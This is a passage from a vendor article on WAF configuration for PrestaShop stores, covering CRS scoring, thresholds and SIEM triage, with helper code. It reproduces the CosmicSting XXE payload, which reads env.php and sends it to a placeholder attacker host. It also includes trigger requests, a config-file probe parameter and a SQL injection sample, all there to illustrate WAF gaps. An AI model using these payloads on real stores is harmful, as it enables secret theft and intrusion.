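            continue; // summary rule, not a scoring rule
        }
        $rules[] = [$id, $m[2] === '?' ? null : (int) $m[2]];
    }
    return $rules;
}

/**
 * Raw and effective score for a deployment running $crsVersion (e.g. "4.19.0")
 * at $paranoiaLevel with a blocking threshold of $threshold points.
 */
function evaluateDeployment(string $output, int $paranoiaLevel, int $threshold, string $crsVersion): array
{
    $raw = 0;
    $effective = 0;
    $dropped = [];
    foreach (parseMatchedRules($output) as [$id, $pl]) {
        $points = RULE_POINTS[$id] ?? 5;
        $raw += $points;

        if ($pl !== null && $pl > $paranoiaLevel) {
            $dropped[] = "$id: requires PL$pl";        // rule not active at this PL
            continue;
        }
        if (isset(RARELY_FIRING_RULES[$id])) {
            $dropped[] = "$id: " . RARELY_FIRING_RULES[$id];
            continue;
        }
        if (isset(RULES_SINCE_4_20[$id]) && version_compare($crsVersion, '4.20.0', '<')) {
            $dropped[] = "$id: " . RULES_SINCE_4_20[$id];
            continue;
        }
        $effective += $points;
    }
    return [
        'raw'       => $raw,
        'effective' => $effective,
        'blocked'   => $effective >= $threshold, // CRS blocks at score >= threshold
        'dropped'   => $dropped,
    ];
}

function demo(): array
{
    // Constructed sample: the sandbox listing shown in section 2.3 for the PHP
    // injection payload at PL2 (rule ids and titles copied from that output).
    $sandboxOutput = <<<'TXT'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 43)
TXT;

    return [
        'PL1, threshold 25' => evaluateDeployment($sandboxOutput, 1, 25, '4.21.0'), // effective 10, passes
        'PL2, threshold 10' => evaluateDeployment($sandboxOutput, 2, 10, '4.21.0'), // effective 33, blocked
        'PL2, threshold 40' => evaluateDeployment($sandboxOutput, 2, 40, '4.21.0'), // raw 43 looks blocked, effective 33 is not
    ];
}

print_r(demo());
```

Feeding it the path traversal listing above with a CRS version below 4.20.0 gives the 10-point effective score the text arrives at, and the PL1 run on the sample reproduces the 10 points seen at Paranoia Level 1 in section 2.3, since every PL2 rule and 932200 are set aside. The drop list is the part worth reading when you tune a threshold: it tells you which rules your score is quietly relying on.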



2.6/ Data theft: XXE - CWE-611



Everyone will remember CosmicSting, the notorious Magento XXE published in the summer of 2024, which - via a call in the checkout flow - made it possible to automatically exfiltrate all files from targeted Magento stores to an attacker-controlled server, including all of their secrets.

Other solutions were also affected by this abuse of the XML engine, and others will certainly follow - until data flows migrate to JSON, which does not (yet) suffer from implicit behaviors with potentially harmful consequences when they aren't properly controlled.

Just like PHAR-based CWE-502 variants, XXE attacks are also two-phased - although for this class of vulnerabilities, the targeted online store will often only see the second phase: the actual attack phase.

Phase 1 – Deploying the offensive payload on public hosting that is accessible by the targeted online store.

First, the attacker must deploy a file on the Internet - one that must be reachable by the targeted online store.

This is the control payload that defines how to exfiltrate data from the targeted site.

For the CosmicSting example, here is the content of the file https://A.B/payload.md:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=../app/etc/env.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://A.B/exfiltration-CVE-2024-34102.php?%data;'>">

Since this payload is hosted on a remote service, it falls outside the scope of the WAF deployed on the online store.

Phase 2 – Triggering the payload.

Second, you need to send the triggering payload to a misconfigured XML parser exposed on the targeted online store. In the CosmicSting case, the payload would look like this:

{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}

Please note that in the case of CosmicSting, this is an XXE embedded within a JSON format.

Let's look at OWASP CRS at PL1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -H 'content-type:application/json' -d '{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}'
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, corresponding to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.

Let's look at PL2 (Paranoia Level 2):

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -H 'content-type:application/json' -d '{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}'
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 33)


Please note the payload score, which comes to 33 points, corresponding to the triggering of six critical rules. However, be careful: rule 932200 was triggered. As mentioned earlier, we therefore need to subtract its score, which gives an adjusted score of 33 − 10 = 23 points.

There is, however, a small “secret” about payloads submitted with a JSON Content-Type: it assumes that the WAF's JSON processor is enabled - which is often not the case, especially if the service isn't managed by a professional WAF integrator. If the processor isn't enabled, and there is no URLENCODED processor as a fallback, this payload could be completely invisible to the WAF.

Those of you with a sharp eye will have understood, however, that it is - once again - not intellectually honest to test this payload purely from the XXE angle, since it is specific to a Magento operating mode.

Let's turn it into a conventional XXE payload with a properly declared XML Content-Type:

<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "https://A.B/payload.md"> %sp; %param1; ]> <r>&exfil;</r>

Let's look at the score, directly on PL2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:4" "http://sandbox.coreruleset.org/" -H 'content-type:application/xml' -d '<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "https://A.B/payload.md"> %sp; %param1; ]> <r>&exfil;</r>'

The CRS Sandbox returns no result - which doesn't mean it wasn't blocked. In fact, this XML input is considered corrupted on hardened systems: the definition of the exfil entity depends on loading the file https://A.B/payload.md. If that file isn't loaded - which is the desired behavior - then an error is generated.

This brings us to another “secret”: the WAF's XML processor is enabled even less often than the JSON processor, often because of third-party services that exchange data without any integrity control on their traffic - we won't name names, but we certainly have a few things to say about certain logistics or marketing companies on that front.

The consequence of not enabling the XML processor is that this payload will be invisible to many WAFs.

We remind WAF integrators that enabling the JSON and XML processors is an obligation and that if you neglect this, you are effectively hiding an entire part of application security that goes far beyond XXE - the vast majority of rules are effectively neutralized (SQL injection / XSS / etc.).

APIs that communicate in XML/JSON - as well as Ajax calls (XHR requests) in JSON - are everywhere in our environments, and this trend is accelerating with headless architectures and the widespread adoption of JSON-based REST APIs.

The implicit behaviors of XML processing engines have caused a lot of damage over the past two years. We encourage you to place these flows behind strict IP allowlisting to reduce the exposure of your XML parsers. This will help reduce your attack surface against future XML-related 0-days, however unlikely they may be.
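The "hardened system" behavior described above, where the parser errors out instead of fetching the remote file, can be made deterministic on the application side regardless of what the WAF sees. Here is an added example in PHP 8 (neither Magento's nor PrestaShop's code, not part of this article) that parses untrusted XML with three independent layers: no DOCTYPE is accepted at all, libxml's external entity loader is replaced by one that always fails, and the parse flags exclude LIBXML_NOENT and LIBXML_DTDLOAD while adding LIBXML_NONET. The two XML documents in it are constructed samples; the host attacker.invalid is a placeholder.

```php
<?php
declare(strict_types=1);

// Added example, not Magento or PrestaShop code: parse untrusted XML with every
// external-entity path closed, so a DOCTYPE carrying a parameter entity is
// refused instead of resolved.

final class XmlInputError extends RuntimeException {}

function parseUntrustedXml(string $xml): DOMDocument
{
    if (trim($xml) === '') {
        throw new XmlInputError('empty document');
    }
    // Layer 1: reject the internal subset outright. Application data exchanged
    // with a store never needs one, and every XXE does.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new XmlInputError('DOCTYPE declarations are not accepted');
    }

    // Layer 2: whatever libxml tries to fetch, it gets nothing back.
    libxml_set_external_entity_loader(
        static fn (?string $publicId, ?string $systemId, array $context) => null
    );
    $previousErrors = libxml_use_internal_errors(true);

    try {
        $dom = new DOMDocument();
        // Layer 3: entity substitution (LIBXML_NOENT) and DTD loading
        // (LIBXML_DTDLOAD) are not requested; LIBXML_NONET forbids network
        // access during parsing.
        if ($dom->loadXML($xml, LIBXML_NONET | LIBXML_NOBLANKS) === false) {
            $err = libxml_get_last_error();
            throw new XmlInputError('XML rejected: ' . ($err ? trim($err->message) : 'malformed XML'));
        }
        return $dom;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previousErrors);
        libxml_set_external_entity_loader(null); // restore the default loader
    }
}

function demo(): array
{
    // Constructed samples: a well-formed order document, and a document whose
    // internal subset declares an external parameter entity pointing at a
    // placeholder host, the shape the text describes for the trigger payload.
    $benign  = '<?xml version="1.0"?><order><id>42</id><sku>ABC-1</sku></order>';
    $hostile = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "https://attacker.invalid/payload.md"> %sp;]><r>&exfil;</r>';

    $out = [];
    foreach (['benign' => $benign, 'hostile' => $hostile] as $name => $xml) {
        try {
            $dom = parseUntrustedXml($xml);
            $out[$name] = 'parsed, root element <' . $dom->documentElement->tagName . '>';
        } catch (XmlInputError $e) {
            $out[$name] = 'rejected: ' . $e->getMessage();
        }
    }
    return $out;
}

print_r(demo());
```

The first layer does the real work and is the one to keep even if the others look redundant: a parser option can be switched back on by a later refactor or a library upgrade, whereas a request that is refused for containing a DOCTYPE never reaches the parser at all.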

The conclusion from this demonstration within the scope of data leaks via the XXE variant is: if your WAF provider
  • has not enabled the XML and JSON processors, so it cannot analyze payloads carried in XML and JSON flows
  • operates at PL1 (paranoia level 1) while not blocking anything above a 10-point score
  • operates at PL2 (paranoia level 2) while not blocking anything above a 20-point score

You have no preventive protection against data leaks via XXE.



The vulnerability classes that should be tested as part of a preventive approach aligned with OWASP recommendations are numerous, and covering them exhaustively is beyond the scope of this article.

Please note that we also cannot cover Content-Type evasion attacks, which aim to slip under the radar of the WAF's processing engines.

We therefore encourage you to get in touch with us to discover our PrestaShop WAF diagnostic tool: it's free.

Our diagnostic tool runs over 6,000 highly heterogeneous attack patterns, enabling you to identify and then fix gaps in your defensive posture - the ones that form (or weaken) the barrier that is supposed to protect you from application-layer threats.

A complete, detailed report will be published here soon - we're currently in discussions with the OWASP CRS core team to finalize it.



3. What about OWASP CRS updates?



The sharpest among you will have noticed that, across all the payloads we tested, we deliberately omitted specifying the version of the OWASP CRS WAF being used.

This means that all the scores shown were calculated using the latest version of the OWASP CRS rules - 4.21.0, which is currently the most complete and mature release.

We're getting to another little WAF secret: they need to be kept up to date regularly, and very few players do so with the necessary rigor.

Earlier versions of OWASP CRS have proven to be real “Swiss cheese” for certain vulnerability classes or for specific business ecosystems - PrestaShop included.

As a result, the scores produced by our test payloads are often much higher than what is observed in real-world conditions, whenever the WAF in place relies on outdated rules - sometimes several years old.

If you use Cloudflare's WAF to protect a PrestaShop site, it is possible to see this obsolescence very quickly.

On your homepage, simply add the following parameter : ?cnmq=/app/config/parameters.php

As long as Cloudflare's WAF does not block this request, it means the rules are still not aligned with the state of the CRS as of November 2, 2025, corresponding to OWASP CRS version 4.20.0.



4. The “little secrets” of WAFs like Cloudflare: for less than €2,400 excl. VAT per year, they don't do much - sometimes nothing at all.



First of all, it's important to reiterate a point that's often overlooked: only Cloudflare's €240 excl. VAT per year plan includes a WAF.

Cloudflare's free plan simply does not include any WAF.

That being said, this so-called “entry-level” plan has a structural limitation that is generally known only to specialists:

it's impossible to configure a blocking threshold below 25 points.


In other words, given the examples presented earlier, Cloudflare - like any OWASP CRS-based WAF that does not enforce PL2 with a 10-point threshold - is ineffective against professional attackers who master WAF fooling techniques: low-fingerprint offensive payloads get through without difficulty.

Cloudflare's Enterprise plan, offered from €2,400 excl. VAT per year, is the only one that provides capabilities truly compatible with OWASP recommendations.

Nevertheless - as is often the case - the devil is in the details.

This plan is by no means a turnkey solution: the configuration remains entirely the customer's responsibility.

Our demonstrations have shown what that configuration must include:
  • Paranoia Level 2, the bare minimum for any professional-grade approach,
  • a blocking threshold of at most 10 points, essential for truly coherent defensive coverage,
  • every request-body processor enabled, including the JSON and XML processors,
  • and OWASP CRS rules kept continuously up to date.

Without these settings, having a WAF is more a security illusion than effective protection.
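To make the interplay of paranoia level and threshold concrete, here is a toy scoring engine added for this edit. It is not CRS or Cloudflare code: its rule ids, patterns and PL assignments are invented placeholders, and only the severity scores follow the CRS defaults (CRITICAL 5, ERROR 4, WARNING 3, NOTICE 2). It shows a quiet time-based SQL injection payload scoring 3 at PL1 and 11 at PL2, a noisy traversal payload scoring 10 at PL1, and which of those a 25-point versus a 10-point threshold actually stops.

```python
"""Toy model of OWASP CRS anomaly scoring: the paranoia level (PL) gates
which rules run, each matching rule adds its severity score, and the request
is blocked once the total reaches the inbound threshold.

Added illustration, not CRS or Cloudflare code. The rules below are made up
for the demo (ids, patterns and PL assignments are not real CRS rules); only
the severity scores follow the CRS defaults.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

CRITICAL, ERROR, WARNING, NOTICE = 5, 4, 3, 2


@dataclass(frozen=True)
class Rule:
    rule_id: str         # placeholder id, not a CRS rule number
    paranoia_level: int  # lowest PL at which the rule is active
    severity: int        # points added to the anomaly score when it fires
    pattern: re.Pattern


TOY_RULES = [
    Rule("toy-lfi-traversal", 1, CRITICAL, re.compile(r"\.\./|\.\.\\")),
    Rule("toy-lfi-os-file",   1, CRITICAL, re.compile(r"/etc/passwd|parameters\.php")),
    Rule("toy-sqli-comment",  1, WARNING,  re.compile(r"--|/\*")),
    Rule("toy-sqli-keyword",  2, CRITICAL, re.compile(r"\b(union|select|sleep)\b", re.I)),
    Rule("toy-metachar",      2, WARNING,  re.compile(r"[<>'\"]")),
    Rule("toy-lone-quote",    3, NOTICE,   re.compile(r"'")),
]


def anomaly_score(args: dict[str, str], paranoia_level: int,
                  rules: list[Rule] = TOY_RULES) -> tuple[int, list[str]]:
    """Sum the severity of every active rule that matches at least one argument."""
    total, hits = 0, []
    for rule in rules:
        if rule.paranoia_level > paranoia_level:
            continue                   # rule is not active at this PL
        if any(rule.pattern.search(v) for v in args.values()):
            total += rule.severity     # each rule counts once per request
            hits.append(rule.rule_id)
    return total, hits


def decide(args: dict[str, str], paranoia_level: int,
           threshold: int) -> tuple[str, int, list[str]]:
    """Block when the inbound anomaly score reaches the threshold (CRS uses >=)."""
    total, hits = anomaly_score(args, paranoia_level)
    return ("block" if total >= threshold else "allow"), total, hits


# Constructed payloads for the walkthrough.
LOW_FINGERPRINT = {"q": "x' or sleep(5)--"}   # quiet time-based SQLi
NOISY_LFI = {"file": "../../etc/passwd"}      # trips two PL1 critical rules

if __name__ == "__main__":
    for name, payload in (("low-fingerprint SQLi", LOW_FINGERPRINT), ("noisy LFI", NOISY_LFI)):
        for pl, threshold in ((1, 25), (2, 25), (2, 10)):
            verdict, total, hits = decide(payload, pl, threshold)
            print(f"{name:21} PL{pl} threshold {threshold:2}: score {total:2} -> {verdict:5} {hits}")
```

The point the run makes: at a 25-point threshold neither payload is blocked, whatever the paranoia level, because even the noisy traversal only accumulates 10 points; the quiet SQL injection is invisible at PL1 (3 points) and only becomes blockable once PL2 rules are active and the threshold is 10.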

At a professional level, tuning the WAF rules and monitoring them through a SIEM represents several thousand hours of work, most of which cannot be pooled or reused across environments.

In our experience, more than 65% of this effort cannot be shared or reused, because it is project-specific due to custom development - a major selling point of open-source platforms, but one with serious consequences when it comes to deploying truly professional cyber-defense mechanisms.

For the skeptics who refuse to face this reality - and who will no doubt reply that Cloudflare's IPS is one of the best in the world and that WAF gaps are therefore compensated by filtering IP addresses identified as malicious - let's remember one essential thing: IPS solutions have a “little secret” too.

They will never reliably block IP addresses coming from “white zones,” i.e., IPs assigned by mass-market telecom operators (residential ISP ranges). Yet today, the bulk of attacks carried out by professional criminal networks against applications comes precisely from these zones.

We can thank, among other things, unregulated connected devices (IoT) and services like IPBurger, which make it possible to rent residential IP addresses that look perfectly legitimate from an IPS standpoint.



5. A WAF without a SIEM = guaranteed damage to your revenue.



A WAF can be compared to long-range artillery capable of striking within a 200 km radius: used poorly, and without sufficient observability, it turns against you and causes collateral damage among your own side.

However, artillery never operates without a radar station and/or a satellite network. The logic is exactly the same for a WAF: it cannot be run at a professional level without a SIEM (Security Information and Event Management), capable of informing you in real time about blocks - whether they are intended or not.

Based on our field experience, the time allocated to the WAF and the SIEM that accompanies it is generally split along a one-third / two-thirds ratio.

Concretely, out of three hours allocated to tuning/enabling a security rule:
  • one hour is devoted to the WAF
  • two hours to the SIEM to handle the alerts

Before you start tuning OWASP CRS rules on your WAF-such as Cloudflare Enterprise - make sure your SIEM is properly bedded in and operational: you're going to need it.
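What “informing you about blocks, intended or not” looks like in practice is a triage pass over the WAF's block events. The following added example (not the article's or any vendor's code) aggregates constructed sample events per rule and ranks the rules by false-positive suspicion: many distinct clients blocked on checkout paths points at a rule that is costing sales, whereas one client tripping a rule across many paths looks like a scanner. The PrestaShop route list and the event records are assumptions made for the demonstration.

```python
"""Rank WAF block events by how likely they are to be false positives that
cost revenue, so the SIEM analyst knows which rules to look at first.

Added example, not the article's or any vendor's code. The event tuples
below are constructed for the demonstration (a real SIEM export would be
mapped onto the same three fields); BUSINESS_PATHS is an assumed list of
PrestaShop routes where a block turns a customer away.
"""
from __future__ import annotations

from collections import defaultdict

# Paths where a block directly costs a sale (assumption for a PrestaShop shop).
BUSINESS_PATHS = ("/cart", "/order", "/authentication", "/module/ps_checkout")

# Constructed events: (rule_id, client_ip, request_path). The CRS numbers are
# real rule ids used as realistic labels; the events themselves are invented.
SAMPLE_EVENTS = [
    ("942100", "203.0.113.10", "/order"),
    ("942100", "198.51.100.7", "/order"),
    ("942100", "192.0.2.44", "/cart"),
    ("942100", "192.0.2.91", "/order"),
    ("930120", "203.0.113.200", "/wp-admin/admin.php"),
    ("930120", "203.0.113.200", "/.env"),
    ("930120", "203.0.113.200", "/app/config/parameters.php"),
    ("930120", "203.0.113.200", "/index.php"),
    ("941100", "198.51.100.23", "/contact-us"),
]


def is_business_path(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in BUSINESS_PATHS)


def triage(events: list[tuple[str, str, str]]) -> list[dict]:
    """Aggregate blocks per rule and score each rule for false-positive suspicion.

    suspicion = share of blocks on business paths x spread of distinct clients
    (1.0 means every block hit a different customer on a revenue path; 0.0
    means no business path was touched or a single client caused them all).
    """
    per_rule: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for rule_id, ip, path in events:
        per_rule[rule_id].append((ip, path))

    rows = []
    for rule_id, hits in per_rule.items():
        ips = {ip for ip, _ in hits}
        paths = {path for _, path in hits}
        business = sum(1 for _, path in hits if is_business_path(path))
        business_share = business / len(hits)
        ip_spread = len(ips) / len(hits)
        suspicion = round(business_share * ip_spread, 2)
        if suspicion >= 0.5:
            verdict = "probable false positive: review rule / add exclusion"
        elif len(ips) == 1 and len(paths) >= 3:
            verdict = "scanner-like: probable true positive"
        else:
            verdict = "needs manual review"
        rows.append({
            "rule_id": rule_id, "blocks": len(hits), "distinct_ips": len(ips),
            "distinct_paths": len(paths), "business_share": round(business_share, 2),
            "suspicion": suspicion, "verdict": verdict,
        })
    # Highest false-positive suspicion first, then by volume.
    rows.sort(key=lambda r: (-r["suspicion"], -r["blocks"]))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(f"rule {row['rule_id']}: {row['blocks']} blocks from {row['distinct_ips']} IPs, "
              f"suspicion {row['suspicion']} -> {row['verdict']}")
```

The two-thirds of effort that goes to the SIEM is largely this kind of qualification work, repeated for every rule and every release: the heuristic only orders the queue, and each "probable false positive" still has to be confirmed against the actual blocked requests before any exclusion is written.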



6. DDoS attacks are the least of your worries.



A DDoS attack rarely exposes you to liability, since by nature its goal is not to compromise your service, but merely to make it unavailable - most often temporarily - with very rare exceptions.

It can cause immediate financial losses, but rarely long-term damage - that kind of damage is most often tied to reputational harm.

While there's no question that Cloudflare is certainly one of the best anti-DDoS providers in the world in terms of capability, please keep in mind that this threat should be the least of your worries in 2026.

The French ecosystem has been heavily impacted for more than two years by massive compromises, as regularly highlighted by Bonjour la fuite.

The reasons vary. Beyond retaliatory actions by pro-Russian groups in response to France's active support for Ukraine, teenagers - emboldened by unrestricted (“libertarian”) AI models - have for more than a year been implicated in large-scale compromises.

While AI is undeniably a technological revolution, it comes with structural challenges that are particularly hard to manage in the short term. Among them: unregulated AI models - the equivalent of roaming improvised explosive devices - now accessible to children whose sense of ethics and morality is not yet fully formed.



7. The questions to ask when buying a WAF.



When you need a WAF and don't want it to be purely decorative, here are the essential questions to ask:
  • What technology is it based on? OWASP CRS, like Cloudflare?
  • If so, which paranoia level is configured, and what is the blocking threshold (minimum anomaly score)?
  • Who manages the CRS rule updates, and under what process?
  • Which SIEM is deployed to analyze blocks so that they do not hurt revenue? What are its limitations?
  • How are the unwanted blocks (false positives) surfaced by the SIEM analyzed, qualified and fixed? Under what criteria are exclusion/unblocking rules defined and applied?
  • Which professional penetration-testing firms or scanning services (such as Qualys WAS) regularly test the defensive setup?
  • Which company audits and measures the WAF's real-world effectiveness (for example, the TouchWeb WAF diagnostic tool)?

When all of these points are handled seriously, you have strong indicators that the provider integrating and operating your WAF is acting professionally. Otherwise, heightened vigilance is required, lest you end up deploying an ineffective setup.

That doesn't mean you'll never be compromised - every cybersecurity mechanism is imperfect by nature - but you do maximize your risk reduction.



8. Conclusion: your security protocols must evolve in proportion to the threat



If we assume an average order value of €68 (source: Fevad) and an observed average resale price of €10 for a stolen French bank card (source: 01net), here is an overview of your exposure by annual revenue:

Profile                             | PCI DSS level / Risk | Annual revenue | Orders / day | Cards (< 48 h) | Cards (< 14 d) | Value (< 48 h) | Value (< 14 d)
Micro-business (very small)         | 4 - Low              | €100K          | 4            | 8              | 56             | €80            | €560
Small business (lower tier)         | 4 - Moderate         | €500K          | 20           | 40             | 280            | €400           | €2,800
Small business (upper tier)         | 4 - High             | €1M            | 40           | 80             | 560            | €800           | €5,600
SME / small enterprise (lower tier) | 3 - Very high        | €2M            | 80           | 160            | 1,120          | €1,600         | €11,200
SME / small enterprise (upper tier) | 3 - Critical         | €10M           | 400          | 800            | 5,600          | €8,000         | €56,000
SME / mid-sized (lower tier)        | 3 - Critical         | €20M           | 800          | 1,600          | 11,200         | €16,000        | €112,000
SME / mid-sized (upper tier)        | 3 - Critical         | €50M           | 2,000        | 4,000          | 28,000         | €40,000        | €280,000

Cards: payment cards compromised between the compromise and its detection (within 48 hours or within 14 days), assuming one card per order. Value: estimated worth for criminals at €10 per card. PCI DSS level: merchant level derived from the yearly transaction count.

Risk assessment must take daily transaction volume into account, not just revenue. A site generating €1M in annual revenue with a €5 average basket (goodies) can face a critical rather than a high risk; conversely, a site generating €50M with a €2,500 average basket (jewelry) may be at high rather than critical risk.

In 2026, all e-commerce businesses generating more than €1M in annual revenue face a high risk, and SMEs are now considered exposed to a very high to critical risk.

Cybersecurity is neither a product nor an optional add-on, let alone a marketing argument to switch on after an incident.

It's a demanding discipline - time-consuming, expensive, and fundamentally incompatible with a mindset of permanent compromise and “lowest-bidder” trade-offs.

A poorly configured WAF, with no observability (SIEM) and no expertise, protects nothing.

It reassures, it looks good, but it doesn't stop adversaries who work methodically, iteratively, and without budget constraints.

The compromises we're seeing today are not a technological inevitability.

They are the direct consequence of human choices: underinvestment, blind delegation, and a refusal to accept that security comes with an irreducible cost.

In cybersecurity as everywhere else, reality always catches up in the end.

And when it does, the bill is invariably higher than the upfront investment that would have prevented it.

If your managed services contract (excluding hosting) costs you less than €6,000 excl. VAT per year, you are almost certainly exposed.

At that budget level, it's unrealistic to expect professional monitoring, proactive security management, or any real response capability with a proactive SIEM.

In an increasingly hostile environment, only companies able to adapt today will preserve their ability to exist tomorrow.

Without cybersecurity, an incident is not a risk but an inevitable deadline.